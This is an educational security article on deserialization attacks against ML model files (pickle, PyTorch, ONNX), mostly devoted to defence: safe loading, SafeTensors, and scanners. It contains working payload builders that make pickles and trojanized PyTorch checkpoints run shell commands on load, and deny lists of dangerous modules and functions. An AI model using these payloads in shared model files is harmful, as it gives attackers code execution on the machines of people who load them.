Model Serialization Attacks
Deserialization attacks on ML model files across pickle, PyTorch, and ONNX formats, and the safe loading practices and formats (such as SafeTensors) that mitigate them.
Overview
Model serialization — the process of saving trained model weights and architecture to disk — is one of the most dangerous attack surfaces in the ML ecosystem. The dominant serialization format for PyTorch models uses Python's pickle module, which is fundamentally insecure: loading a pickle file can execute arbitrary Python code. This means that downloading and loading a model from an untrusted source is equivalent to downloading and running an executable from that source.
This vulnerability is not theoretical. Researchers have repeatedly demonstrated malicious model files on Hugging Face Hub and other model repositories. The attack surface is broad because model loading is so routine — data scientists and ML engineers regularly download pre-trained models and fine-tuned checkpoints, often with minimal verification. The widespread culture of sharing models through platforms like Hugging Face has normalized a practice that would be considered reckless in traditional software engineering.
This article covers the mechanics of serialization attacks across formats (pickle, ONNX, TensorRT), demonstrates how to craft and detect malicious model files, and provides safe loading practices. The attacks map to MITRE ATLAS AML.T0010 (ML Supply Chain Compromise) and are addressed by OWASP LLM Top 10 2025 LLM04 (Data and Model Poisoning).
Python Pickle: The Root Vulnerability
How Pickle Works
Python's pickle module serializes Python objects by recording the instructions needed to reconstruct them. When unpickling, these instructions are executed by a virtual machine. The critical security issue is that pickle's instruction set includes the REDUCE opcode, which calls an arbitrary callable with arbitrary arguments. This is by design — pickle needs to reconstruct complex objects — but it means that a crafted pickle file can invoke os.system, subprocess.Popen, or any other Python function.
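Before the full exploit classes below, the mechanism can be shown with a harmless stand-in: the callable returned by __reduce__ here is the builtin abs, but the unpickler would invoke os.system in exactly the same way.

```python
import pickle

class ReduceDemo:
    """__reduce__ tells the unpickler: call this callable with these
    arguments. Here the callable is the harmless builtin abs, but the
    pickle protocol places no restriction on what it may be."""
    def __reduce__(self):
        return (abs, (-42,))

payload = pickle.dumps(ReduceDemo())
result = pickle.loads(payload)  # the unpickler calls abs(-42)
print(result)  # 42
```

Note that loading does not return a ReduceDemo instance at all; the object is replaced by whatever the callable returns, which is why a payload can both run code and hand back legitimate-looking data.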
import pickle
class PickleExploit:
"""
Demonstrate how pickle deserialization enables code execution.
FOR EDUCATIONAL PURPOSES ONLY — use in controlled environments.
"""
@staticmethod
def create_malicious_pickle(command: str) -> bytes:
"""
Create a pickle payload that executes a shell command on load.
This demonstrates why pickle is fundamentally unsafe for untrusted data.
"""
# The __reduce__ method tells pickle how to reconstruct the object.
# By returning (os.system, (command,)), we instruct the unpickler
# to call os.system(command) when loading.
import os
class Exploit:
def __reduce__(self):
return (os.system, (command,))
return pickle.dumps(Exploit())
@staticmethod
def create_stealthy_payload(command: str, legitimate_data: dict) -> bytes:
"""
Create a payload that executes code AND returns legitimate-looking data.
This is harder to detect because the model appears to load correctly.
"""
# This payload first executes the command, then returns normal data
class StealthExploit:
def __init__(self, data):
self.data = data
def __reduce__(self):
                # Use eval() to run the command, then return the legitimate data
return (
eval,
(
f"__import__('os').system('{command}') and None or {repr(self.data)}",
),
)
        return pickle.dumps(StealthExploit(legitimate_data))
PyTorch Model Files
PyTorch's torch.save() uses pickle by default. A malicious PyTorch model file (.pt, .pth, or .bin) can execute arbitrary code when loaded with torch.load():
import torch
import torch.nn as nn
from typing import Dict, Any
import os
class MaliciousModelDemo:
"""
Demonstrate malicious PyTorch model file creation.
FOR EDUCATIONAL PURPOSES IN CONTROLLED ENVIRONMENTS ONLY.
"""
@staticmethod
def create_backdoored_model(
legitimate_model: nn.Module,
payload_command: str,
output_path: str,
) -> None:
"""
Save a model that executes a payload when loaded.
The model functions normally after loading — the payload is stealthy.
"""
class TrojanizedState(dict):
"""A dict subclass that executes code when unpickled."""
def __init__(self, state_dict: dict, command: str):
super().__init__(state_dict)
self._command = command
def __reduce__(self):
# When unpickled:
# 1. Execute the payload
# 2. Return a normal dict (so the model loads correctly)
return (
_reconstruct_with_payload,
(dict(self), self._command),
)
state = TrojanizedState(legitimate_model.state_dict(), payload_command)
torch.save(state, output_path)
def _reconstruct_with_payload(state_dict: dict, command: str) -> dict:
    """Helper function used during deserialization.

    Note: the pickle stores this helper as a module-path reference, so this
    exact payload only fires if the module is importable on the loading side.
    Real attacks reference stdlib callables such as os.system directly to
    avoid that dependency.
    """
    os.system(command)
    return state_dict
class SafeModelLoader:
"""Load PyTorch models with safety checks."""
@staticmethod
def load_with_weights_only(path: str, map_location: str = "cpu") -> Dict:
"""
Load a model using weights_only=True (PyTorch 2.0+).
This restricts unpickling to tensor data only.
"""
try:
state_dict = torch.load(
path,
map_location=map_location,
weights_only=True, # Critical security flag
)
return {"success": True, "state_dict": state_dict}
except Exception as e:
return {
"success": False,
"error": str(e),
"detail": "Model file may contain non-tensor data (potential exploit)",
}
@staticmethod
def scan_pickle_for_dangerous_ops(file_path: str) -> list:
"""
Scan a pickle file for potentially dangerous operations
WITHOUT executing them.
"""
import pickletools
findings = []
dangerous_modules = {
"os", "subprocess", "sys", "shutil", "builtins",
"importlib", "ctypes", "socket", "http", "urllib",
"requests", "pathlib", "tempfile", "webbrowser",
}
dangerous_functions = {
"system", "popen", "exec", "eval", "execfile",
"compile", "__import__", "getattr", "setattr",
"globals", "locals", "open", "input",
}
try:
with open(file_path, "rb") as f:
data = f.read()
# Use pickletools to disassemble without executing
            # pickletools renders GLOBAL/INST args as "module qualname"
            # (space-separated); STACK_GLOBAL carries no arg and takes its
            # module and name from the two string pushes that precede it,
            # so track recent string opcodes.
            recent_strings = []
            for opcode, arg, pos in pickletools.genops(data):
                if opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
                    recent_strings = (recent_strings + [arg])[-2:]
                reference = None
                if opcode.name in ("GLOBAL", "INST") and isinstance(arg, str):
                    reference = arg.replace(" ", ".")
                elif opcode.name == "STACK_GLOBAL" and len(recent_strings) == 2:
                    reference = ".".join(recent_strings)
                if reference:
                    module, _, func = reference.partition(".")
                    if module in dangerous_modules or func in dangerous_functions:
                        findings.append({
                            "severity": "critical",
                            "position": pos,
                            "opcode": opcode.name,
                            "reference": reference,
                            "finding": f"Dangerous reference: {reference}",
                        })
                elif opcode.name == "REDUCE":
                    findings.append({
                        "severity": "medium",
                        "position": pos,
                        "opcode": "REDUCE",
                        "finding": "REDUCE opcode found — triggers function call during unpickling",
                    })
except Exception as e:
findings.append({
"severity": "error",
"finding": f"Failed to analyze pickle file: {e}",
})
        return findings
SafeTensors: The Secure Alternative
SafeTensors is a serialization format developed by Hugging Face specifically to address the security problems of pickle. It stores only tensor data — shapes, dtypes, and raw numeric data — with no mechanism for embedding executable code.
SafeTensors Architecture
The format is simple:
- An 8-byte header size (little-endian uint64)
- A JSON header describing tensor names, shapes, dtypes, and byte offsets
- Raw tensor data in contiguous byte arrays
There is no code, no object reconstruction, no callable invocation — just data.
from safetensors import safe_open
from safetensors.torch import save_file, load_file
import torch
from typing import Dict
from pathlib import Path
class SafeTensorsManager:
"""Manage model weights using the SafeTensors format."""
@staticmethod
def convert_pytorch_to_safetensors(
pytorch_path: str,
safetensors_path: str,
) -> Dict:
"""Convert a PyTorch model file to SafeTensors format."""
# Load with weights_only=True for safety during conversion
state_dict = torch.load(
pytorch_path, map_location="cpu", weights_only=True
)
# Ensure all values are tensors
tensor_dict = {}
for key, value in state_dict.items():
if isinstance(value, torch.Tensor):
tensor_dict[key] = value
else:
print(f"Warning: Skipping non-tensor key '{key}' (type: {type(value)})")
save_file(tensor_dict, safetensors_path)
return {
"input": pytorch_path,
"output": safetensors_path,
"tensors_saved": len(tensor_dict),
"tensors_skipped": len(state_dict) - len(tensor_dict),
}
@staticmethod
def verify_safetensors_integrity(file_path: str) -> Dict:
"""Verify a SafeTensors file's integrity and inspect its contents."""
path = Path(file_path)
result = {
"file": file_path,
"size_bytes": path.stat().st_size,
"format_valid": False,
"tensors": [],
}
try:
with safe_open(file_path, framework="pt", device="cpu") as f:
keys = f.keys()
for key in keys:
tensor = f.get_tensor(key)
result["tensors"].append({
"name": key,
"shape": list(tensor.shape),
"dtype": str(tensor.dtype),
})
result["format_valid"] = True
result["tensor_count"] = len(keys)
except Exception as e:
result["error"] = str(e)
        return result
Limitations of SafeTensors
SafeTensors is not a complete model format — it stores only tensors, not the model architecture, optimizer state, or training configuration. This means:
- Model architecture must be defined in code and the SafeTensors file provides only the weights
- Custom objects (learning rate schedules, custom layers) cannot be serialized
- Some Hugging Face models still ship pickle files alongside SafeTensors for backwards compatibility
ONNX Security Considerations
ONNX (Open Neural Network Exchange) is an open format for ML models that uses Protocol Buffers serialization. It is safer than pickle because it uses a defined schema rather than arbitrary code execution. However, ONNX has its own security concerns:
Custom Operators
ONNX supports custom operators that can load and execute shared libraries:
from typing import Dict, List
from pathlib import Path
class ONNXSecurityScanner:
"""Scan ONNX models for security issues."""
def scan_model(self, model_path: str) -> List[Dict]:
"""Scan an ONNX model for security concerns."""
import onnx
findings = []
model = onnx.load(model_path)
# Check for custom operators (could load arbitrary shared libraries)
for node in model.graph.node:
if node.domain and node.domain not in ("", "ai.onnx", "ai.onnx.ml"):
findings.append({
"severity": "high",
"finding": f"Custom operator domain: {node.domain}",
"operator": node.op_type,
"detail": "Custom operators may load arbitrary native code",
})
# Check for external data references
for initializer in model.graph.initializer:
if initializer.data_location == 1: # External data
external_path = ""
for entry in initializer.external_data:
if entry.key == "location":
external_path = entry.value
findings.append({
"severity": "medium",
"finding": f"External data reference: {external_path}",
"detail": "External data could point to a malicious file path",
})
# Check model metadata for suspicious content
for prop in model.metadata_props:
if any(kw in prop.value.lower() for kw in ["exec", "system", "eval", "import"]):
findings.append({
"severity": "medium",
"finding": f"Suspicious metadata: {prop.key}",
"value_preview": prop.value[:100],
})
        # Check file size vs parameter count (anomalously large models may contain embedded data)
        file_size = Path(model_path).stat().st_size
        # Count tensor elements, not just the number of initializer tensors
        param_count = 0
        for init in model.graph.initializer:
            elements = 1
            for dim in init.dims:
                elements *= dim
            param_count += elements
        if param_count > 0:
            bytes_per_param = file_size / param_count
            if bytes_per_param > 32:  # even fp64 needs only 8 bytes per parameter
findings.append({
"severity": "low",
"finding": f"Anomalous file size ratio: {bytes_per_param:.0f} bytes/parameter",
"detail": "Model file may contain embedded non-model data",
})
        return findings
Model File Scanning Pipeline
Automated Scanning in CI/CD
Integrate model file scanning into your ML pipeline's CI/CD:
import hashlib
import json
from pathlib import Path
from typing import Dict, List, Optional
from datetime import datetime, timezone
class ModelFileScanner:
"""Comprehensive model file security scanner for CI/CD pipelines."""
SAFE_FORMATS = {".safetensors", ".onnx", ".tflite", ".pb"}
UNSAFE_FORMATS = {".pkl", ".pickle", ".pt", ".pth", ".bin", ".joblib"}
def __init__(self, policy: str = "strict"):
"""
Args:
policy: 'strict' blocks all unsafe formats,
'warn' logs warnings but allows loading
"""
self.policy = policy
def scan_directory(self, directory: str) -> Dict:
"""Scan a directory of model files for security issues."""
path = Path(directory)
results = {
"scan_time": datetime.now(timezone.utc).isoformat(),
"directory": directory,
"policy": self.policy,
"files_scanned": 0,
"findings": [],
"blocked": [],
"safe_files": [],
}
for file_path in path.rglob("*"):
if not file_path.is_file():
continue
results["files_scanned"] += 1
suffix = file_path.suffix.lower()
if suffix in self.UNSAFE_FORMATS:
finding = {
"file": str(file_path),
"format": suffix,
"severity": "high",
"finding": f"Unsafe serialization format: {suffix}",
}
# Deep scan pickle-based files
if suffix in (".pkl", ".pickle", ".pt", ".pth", ".bin"):
try:
pickle_findings = SafeModelLoader.scan_pickle_for_dangerous_ops(
str(file_path)
)
if pickle_findings:
finding["pickle_analysis"] = pickle_findings
finding["severity"] = "critical"
except Exception as e:
finding["scan_error"] = str(e)
results["findings"].append(finding)
if self.policy == "strict":
results["blocked"].append(str(file_path))
elif suffix in self.SAFE_FORMATS:
results["safe_files"].append(str(file_path))
results["pass"] = len(results["blocked"]) == 0
return results
def generate_manifest(self, directory: str) -> Dict[str, str]:
"""Generate a hash manifest for all model files in a directory."""
path = Path(directory)
manifest = {}
for file_path in sorted(path.rglob("*")):
if file_path.is_file():
sha256 = hashlib.sha256()
with open(file_path, "rb") as f:
for chunk in iter(lambda: f.read(8192), b""):
sha256.update(chunk)
relative = str(file_path.relative_to(path))
manifest[relative] = sha256.hexdigest()
        return manifest
Scanning with Existing Tools
Several tools can scan model files for malicious content:
#!/bin/bash
# Model file security scanning pipeline
MODEL_DIR="$1"
if [ -z "$MODEL_DIR" ]; then
echo "Usage: $0 <model_directory>"
exit 1
fi
echo "=== Model File Security Scan ==="
echo "Directory: $MODEL_DIR"
echo ""
# Check for unsafe file formats
echo "[*] Checking file formats:"
find "$MODEL_DIR" -type f \( -name "*.pkl" -o -name "*.pickle" \) | while read f; do
echo " CRITICAL: Pickle file found: $f"
done
find "$MODEL_DIR" -type f \( -name "*.pt" -o -name "*.pth" -o -name "*.bin" \) | while read f; do
echo " WARNING: PyTorch file (may use pickle): $f"
done
find "$MODEL_DIR" -type f -name "*.safetensors" | while read f; do
echo " OK: SafeTensors file: $f"
done
# Use fickling to analyze pickle files if available
echo ""
echo "[*] Deep pickle analysis (requires fickling):"
if command -v fickling &>/dev/null; then
find "$MODEL_DIR" -type f \( -name "*.pkl" -o -name "*.pickle" -o -name "*.pt" -o -name "*.pth" \) | while read f; do
echo " Analyzing: $f"
fickling --check-safety "$f" 2>/dev/null || echo " Could not analyze $f"
done
else
echo " fickling not installed. Install with: pip install fickling"
fi
# Use modelscan if available
echo ""
echo "[*] ModelScan analysis (requires modelscan):"
if command -v modelscan &>/dev/null; then
modelscan scan -p "$MODEL_DIR"
else
echo " modelscan not installed. Install with: pip install modelscan"
fi
echo ""
echo "=== Scan Complete ==="
The tools referenced above are real:
- fickling (Trail of Bits): Static analysis of pickle files without executing them. https://github.com/trailofbits/fickling
- modelscan (Protect AI): Scans model files for unsafe operations across formats. https://github.com/protectai/modelscan
Format Comparison
| Format | Code Execution Risk | Ecosystem Support | Performance | Recommended |
|---|---|---|---|---|
| Pickle (.pkl) | Critical — arbitrary code execution | Universal Python | Fast | Never for untrusted sources |
| PyTorch (.pt/.pth) | High — uses pickle internally | PyTorch ecosystem | Fast | Use weights_only=True |
| SafeTensors | None — data only | Hugging Face, growing | Fast | Yes — preferred format |
| ONNX (.onnx) | Low — custom ops can load code | Cross-framework | Good | Yes, with custom op review |
| TensorRT (.plan) | Low — engine format | NVIDIA inference | Fastest | Yes, for NVIDIA deployment |
| TFLite (.tflite) | Low — flatbuffers format | Mobile/edge | Good | Yes, for edge deployment |
Defensive Recommendations
- Use SafeTensors as the default serialization format for all new models
- Always use weights_only=True when loading PyTorch models with torch.load()
- Scan all model files in CI/CD pipelines before deployment using fickling or modelscan
- Never load pickle files from untrusted sources — treat them as executables
- Convert existing pickle models to SafeTensors format and deprecate the pickle versions
- Verify model file hashes against a trusted manifest before loading
- Restrict model download sources to approved registries with verified publishers
- Monitor Hugging Face models for post-upload modifications (use commit hashes, not branch refs)
References
- Trail of Bits fickling — https://github.com/trailofbits/fickling — static analysis for pickle files
- Protect AI modelscan — https://github.com/protectai/modelscan — multi-format model file scanner
- Hugging Face SafeTensors — https://github.com/huggingface/safetensors
- MITRE ATLAS — AML.T0010 (ML Supply Chain Compromise)
- OWASP LLM Top 10 2025 — LLM04 (Data and Model Poisoning)
- Python pickle documentation — https://docs.python.org/3/library/pickle.html — see the security warnings
- PyTorch weights_only documentation — https://pytorch.org/docs/stable/generated/torch.load.html